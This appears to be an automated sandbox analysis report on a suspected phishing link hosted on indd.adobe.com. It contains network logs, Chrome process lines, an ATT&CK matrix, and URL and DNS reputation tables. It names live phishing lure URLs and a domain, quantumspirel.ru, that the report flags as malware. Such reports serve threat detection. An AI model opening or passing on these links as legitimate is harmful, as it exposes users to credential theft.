        Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50448 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50134 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50237 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50380 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50272 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50345 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50249 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50379 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50323 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50294 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
        Source: unknownNetwork traffic detected: HTTP traffic on port 50229 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50296 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50099
        Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50404 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 50399 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
        Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49916 version: TLS 1.2
        Source: classification engineClassification label: mal88.phis.win@27/839@278/92
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6596 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6596 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6668 --field-trial-handle=2200,i,1713743862320339856,8085997098441764647,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected

        Persistence and Installation Behavior

        barindex
        Source: https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1LLM: Page with brand: 'Microsoft' contains button: 'Click to Access Document' Source: '2.4.pages.csv'
        Source: https://pblc.me/pub/40f029dddc28e3LLM: Page with brand: '' contains button: 'View Your Statement' Source: '10.9.pages.csv'
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting
        Valid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Scripting
        1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Registry Run Keys / Startup Folder
        Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1501906 URL: https://indd.adobe.com/view... Startdate: 30/08/2024 Architecture: WINDOWS Score: 88 19 c.lytics.io 2->19 21 www.facebook.com 2->21 23 6 other IPs or domains 2->23 35 Suricata IDS alerts for network traffic 2->35 37 Antivirus detection for URL or domain 2->37 39 Yara detected HtmlPhish70 2->39 41 5 other signatures 2->41 7 chrome.exe 9 2->7         started        10 chrome.exe 2->10         started        signatures3 process4 dnsIp5 25 192.168.2.5 unknown unknown 7->25 27 239.255.255.250 unknown Reserved 7->27 12 chrome.exe 7->12         started        15 chrome.exe 7->15         started        17 chrome.exe 6 7->17         started        process6 dnsIp7 29 quantumspirel.ru 172.67.187.13 CLOUDFLARENETUS United States 12->29 31 c.lytics.io 172.67.73.236 CLOUDFLARENETUS United States 12->31 33 132 other IPs or domains 12->33

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c10%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://stats.g.doubleclick.net/g/collect0%URL Reputationsafe
        https://tailwindcss.com0%URL Reputationsafe
        https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js0%URL Reputationsafe
        http://underscorejs.org0%URL Reputationsafe
        https://ampcid.google.com/v1/publisher:getClientId0%URL Reputationsafe
        https://px.ads.linkedin.com/collect?0%URL Reputationsafe
        https://q.quora.com/_/ad/0%URL Reputationsafe
        https://www.internalfb.com/intern/invariant/0%URL Reputationsafe
        https://metrics.api.drift.com0%URL Reputationsafe
        https://js.driftt.com/core/assets/js/22.6b9a301a.chunk.js0%URL Reputationsafe
        https://stats.g.doubleclick.net/j/collect0%URL Reputationsafe
        https://customer.api.drift.com0%URL Reputationsafe
        https://api-iam.intercom.io/messenger/web/ping0%URL Reputationsafe
        https://cdn.cookielaw.org/scripttemplates/otSDKStub.js0%URL Reputationsafe
        https://sketch.com0%URL Reputationsafe
        https://p.typekit.net/p.css?s=1&k=urt5zuu&ht=tk&f=7180.7181.7182.7183&a=108349166&app=typekit&e=css0%Avira URL Cloudsafe
        https://cdn.cookielaw.org/scripttemplates/202403.2.0/assets/otCommonStyles.css0%Avira URL Cloudsafe
        https://js.driftt.com/core/assets/js/16.d215b579.chunk.js0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/0c617aed-05cb-4242-a1ed-7a7e79c76fb7.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F0%Avira URL Cloudsafe
        https://conversation.api.drift.com0%URL Reputationsafe
        https://quantumspirel.ru/#faq100%Avira URL Cloudmalware
        https://td.doubleclick.net/td/bjs0%URL Reputationsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/229dd3ed-048e-42a1-96c3-68cd64c6a705.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f2e2e04e-14be-474e-8d90-7162080c28b0.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://js.driftt.com/core/assets/js/8.3f6aefd1.chunk.js0%Avira URL Cloudsafe
        https://cdn0.capterra-static.com/static/javascripts/ecid.js0%Avira URL Cloudsafe
        https://publicate.it/images/template5-p-500.png0%Avira URL Cloudsafe
        https://forms-as-a-service.capterra.com/modal/6HyOcTRcBkZLAc2QGex3tl?formId=6HyOcTRcBkZLAc2QGex3tl0%Avira URL Cloudsafe
        https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/d?primer=7cdcb44be4a7db8877ffa5c0007b80%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/91f64896-759a-41ae-8d14-d540f90c5870.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR0%Avira URL Cloudsafe
        https://play.google.com/store/apps/details?id=com.facebook.orca0%Avira URL Cloudsafe
        https://reveal.clearbit.com/v1/companies/reveal?authorization=pk_4e234eeab65b11414ee6da2ca87259ad&callback=clearbitCallback0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/a67f601c-1c43-4480-8665-f74fae6e4252.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR0%Avira URL Cloudsafe
        https://q.quora.com/_/ad/f3ffe7daf89b419a979311e77be0152b/pixel?tag=ViewContent&i=gtm&u=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/868db486-b684-43a7-827e-5e14b017756d.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://reviews.capterra.com/_next/static/css/50b7e331868b2bdc.css0%Avira URL Cloudsafe
        https://publicate.it/images/template4-p-500.png0%Avira URL Cloudsafe
        https://tracking.capterra.com/visitor/v200/svrGP?pps=3&siteid=68275882&ref2=https%3A%2F%2Fwww.capterra.com%2F&tzo=300&ms=211&optin=disabled&firstPartyCookieDomain=tracking.capterra.com0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/90cac4f1-9eba-4d30-9949-91da634d4da5.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://reviews.capterra.com/_next/static/rlbEn55nmth45KPaQkAHZ/_buildManifest.js0%Avira URL Cloudsafe
        https://static.hotjar.com/c/hotjar-2431713.js?sv=70%Avira URL Cloudsafe
        https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=6ac51e01-fb3b-4a59-9747-d18ff3f51754&batch_time=17250346314890%Avira URL Cloudsafe
        https://publicate.it/images/favicon.png0%Avira URL Cloudsafe
        https://github.com/microsoft/clarity0%Avira URL Cloudsafe
        https://publicate.it/images/more_clients.svg0%Avira URL Cloudsafe
        https://cdn.cookielaw.org/scripttemplates/202403.2.0/assets/otCenterRounded.json0%Avira URL Cloudsafe
        https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=348da171-cce5-486b-9006-75e82163887e&batch_time=17250346216270%Avira URL Cloudsafe
        https://lead-acquisition-service.softwareadvice.com/las-form-min.js0%Avira URL Cloudsafe
        https://js.intercomcdn.com/frame.198be77c.js0%Avira URL Cloudsafe
        https://reviews.capterra.com/fsrelay/rec/integrations?OrgId=18VAT4&isInFrame=false&isNative=false0%Avira URL Cloudsafe
        https://docs.amplify.aws/lib/troubleshooting/upgrading/q/platform/js)0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/67665783-bd0d-4b97-99af-c628a74ea005.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://reviews.capterra.com/fsrelay/rec/bundle/v2?OrgId=18VAT4&UserId=da9f39f7-d4a4-45f4-948f-86299cb47816&SessionId=084a7745-8adb-4b14-adf2-26e4e4ddbd6e&PageId=e2e5b10c-4bbc-4510-b497-529b569fdc46&Seq=2&ClientTime=1725034630155&PageStart=1725034624939&PrevBundleTime=1725034629801&LastActivity=2305&IsNewSession=true&ContentEncoding=gzip0%Avira URL Cloudsafe
        https://edge.fullstory.com/datalayer/v4/latest.js0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/af2cdc9a-967d-4921-a711-ec9e1a75cf88.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR0%Avira URL Cloudsafe
        https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=5e9170ba37cf8dfae03ae1a40%Avira URL Cloudsafe
        https://quantumspirel.ru/#services100%Avira URL Cloudmalware
        https://reviews.capterra.com/_next/static/css/a4a58254eecf0029.css0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/08d2adc0-b055-41c3-9caa-981ebab6ae4e.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://quantumspirel.ru/#modern-supercars100%Avira URL Cloudmalware
        https://forms-as-a-service.capterra.com/modal/3ob5sl3RSLbslH6LvzUKQc?formId=3ob5sl3RSLbslH6LvzUKQc0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/507b7e72-a477-4dee-a78d-fb9cc5d95d75.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://publicate.it/images/template3-p-500.png0%Avira URL Cloudsafe
        https://use.typekit.net/af/95bf80/00000000000000007735dacd/30/l?primer=7cdcb44be4a7db8877ffa5c0007b80%Avira URL Cloudsafe
        https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=17250345979370%Avira URL Cloudsafe
        https://quantumspirel.ru/#contact100%Avira URL Cloudmalware
        https://publicate.it/images/nhph3-p-500.jpg0%Avira URL Cloudsafe
        https://aws-amplify.github.io/docs/js/authentication#amplify-project-setup0%Avira URL Cloudsafe
        https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=900a0ed1-f9ed-43a5-9c5e-2b6ae372e5d0&batch_time=17250346289180%Avira URL Cloudsafe
        https://publicate.it/images/macOS_client.svg0%Avira URL Cloudsafe
        https://publicate.it/images/template2-p-500.png0%Avira URL Cloudsafe
        http://github.com/garycourt/murmurhash-js0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/7780d136-e630-42e5-adce-8f580dc09687.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://publicate.it/images/group-2.svg0%Avira URL Cloudsafe
        https://c.lytics.io/c/7dafa3f5f9e8efd6782940aa05719f120%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/dd1b7965-612d-4c53-899b-0cf4a9337971.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR0%Avira URL Cloudsafe
        https://use.typekit.net0%Avira URL Cloudsafe
        https://js.intercomcdn.com/vendor.e6414237.js0%Avira URL Cloudsafe
        https://use.typekit.net/af/c0160f/00000000000000007735dac8/30/l?primer=7cdcb44be4a7db8877ffa5c0007b80%Avira URL Cloudsafe
        https://widget.intercom.io/widget/cirlxq0d0%Avira URL Cloudsafe
        https://reviews.capterra.com/_next/static/chunks/pages/_app-af44b767735d6640.js0%Avira URL Cloudsafe
        https://publicate.it/images/groupon.svg0%Avira URL Cloudsafe
        https://js.driftt.com/include/1725034800000/5amzsk8w99z9.js0%Avira URL Cloudsafe
        https://unpkg.com/web-vitals/dist/web-vitals.iife.js0%Avira URL Cloudsafe
        https://publicate.it/images/home_banner.png0%Avira URL Cloudsafe
        https://publicate.it/images/features_review_icon.png0%Avira URL Cloudsafe
        https://publicate.it/images/Trustpilot_logo.png0%Avira URL Cloudsafe
        https://reviews.capterra.com/_next/static/css/d1857e6f465dd807.css0%Avira URL Cloudsafe
        https://nexus-websocket-a.intercom.io/pubsub/5-2VrTcJ-wReFxxSsvN27p3l1l-rfQjhxEa0K_rcpidI_YYfbgqGBaXudDoBZfnBOD-yT-ZZ7mQ1OR91C6MrHx-21kDMXCDQnf8S3-?X-Nexus-New-Client=true&X-Nexus-Version=0.14.0&user_role=visitor0%Avira URL Cloudsafe
        https://quantumspirel.ru//100%Avira URL Cloudmalware
        https://browser-intake-datadoghq.com/api/v2/rum?ddsource=browser&ddtags=sdk_version%3A5.23.3%2Capi%3Afetch%2Cenv%3Aprod%2Cservice%3Acrf-webapp%2Cversion%3Av0.0.1104&dd-api-key=pub17f8b79f8664e25ed6d261e2367906a1&dd-evp-origin-version=5.23.3&dd-evp-origin=browser&dd-request-id=3c96175d-ecf5-4c08-b0ee-3fd5976ae652&batch_time=17250346260200%Avira URL Cloudsafe
        https://reviews.capterra.com/api/v1/products/mix?lang=en&limit=48&page=0&sortBy=popularity&withFillers=true0%Avira URL Cloudsafe
        https://reviews.capterra.com/_next/static/chunks/pages/products-search-269c80371465c95a.js0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/b6523a00-951e-4e60-b7e0-a904d177d6dd.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://publicate.it/images/template1-p-500.png0%Avira URL Cloudsafe
        https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/95b201e8-845a-4064-a9b2-a8eb49d19ca3.png?w=60&h=60&dpr=2&auto=format0%Avira URL Cloudsafe
        https://publicate.it/images/adobe.svg0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        img.pblc.it
        188.114.97.3
        truefalse
          unknown
          pub-e1c6f3d85d51402790227684363ac52c.r2.dev
          104.18.2.35
          truefalse
            unknown
            d2vtt4oircqqvk.cloudfront.net
            13.32.27.18
            truefalse
              unknown
              publicate.it
              104.26.8.234
              truefalse
                unknown
                d28mvs9821idoy.cloudfront.net
                18.66.102.126
                truefalse
                  unknown
                  stats.g.doubleclick.net
                  74.125.133.156
                  truefalse
                    unknown
                    c.lytics.io
                    172.67.73.236
                    truetrue
                      unknown
                      cdnjs.cloudflare.com
                      104.17.24.14
                      truefalse
                        unknown
                        platform-api.sharethis.com
                        3.160.212.127
                        truefalse
                          unknown
                          js.hs-scripts.com
                          104.16.141.209
                          truefalse
                            unknown
                            www.google.com
                            142.250.185.132
                            truefalse
                              unknown
                              dualstack.com.imgix.map.fastly.net
                              151.101.2.208
                              truefalse
                                unknown
                                q.quora.com
                                52.5.177.15
                                truefalse
                                  unknown
                                  reveal.clearbit.com
                                  18.153.4.44
                                  truefalse
                                    unknown
                                    static-cdn.hotjar.com
                                    18.239.94.121
                                    truefalse
                                      unknown
                                      js.intercomcdn.com
                                      18.239.94.98
                                      truefalse
                                        unknown
                                        star-mini.c10r.facebook.com
                                        157.240.251.35
                                        truefalse
                                          unknown
                                          www.ipqualityscore.com
                                          172.67.72.12
                                          truefalse
                                            unknown
                                            tr-rc.lfeeder.com
                                            18.239.83.81
                                            truefalse
                                              unknown
                                              pblc.me
                                              172.67.129.239
                                              truefalse
                                                unknown
                                                dna8twue3dlxq.cloudfront.net
                                                3.165.190.57
                                                truefalse
                                                  unknown
                                                  api-iam.intercom.io
                                                  52.87.4.7
                                                  truefalse
                                                    unknown
                                                    edge.fullstory.com
                                                    35.201.112.186
                                                    truefalse
                                                      unknown
                                                      dja7ygzgr04yk.cloudfront.net
                                                      18.239.83.5
                                                      truefalse
                                                        unknown
                                                        vimeo.map.fastly.net
                                                        151.101.192.217
                                                        truefalse
                                                          unknown
                                                          device.maxmind.com
                                                          162.159.134.22
                                                          truefalse
                                                            unknown
                                                            p04e.t.eloqua.com
                                                            147.154.52.189
                                                            truefalse
                                                              unknown
                                                              analytics-alv.google.com
                                                              216.239.34.181
                                                              truefalse
                                                                unknown
                                                                googleads.g.doubleclick.net
                                                                142.250.185.226
                                                                truefalse
                                                                  unknown
                                                                  assets.getalvis.com
                                                                  104.21.84.57
                                                                  truefalse
                                                                    unknown
                                                                    challenges.cloudflare.com
                                                                    104.18.95.41
                                                                    truefalse
                                                                      unknown
                                                                      td.doubleclick.net
                                                                      142.250.186.66
                                                                      truefalse
                                                                        unknown
                                                                        reviews.capterra.com
                                                                        13.227.219.13
                                                                        truefalse
                                                                          unknown
                                                                          www.woopra.com
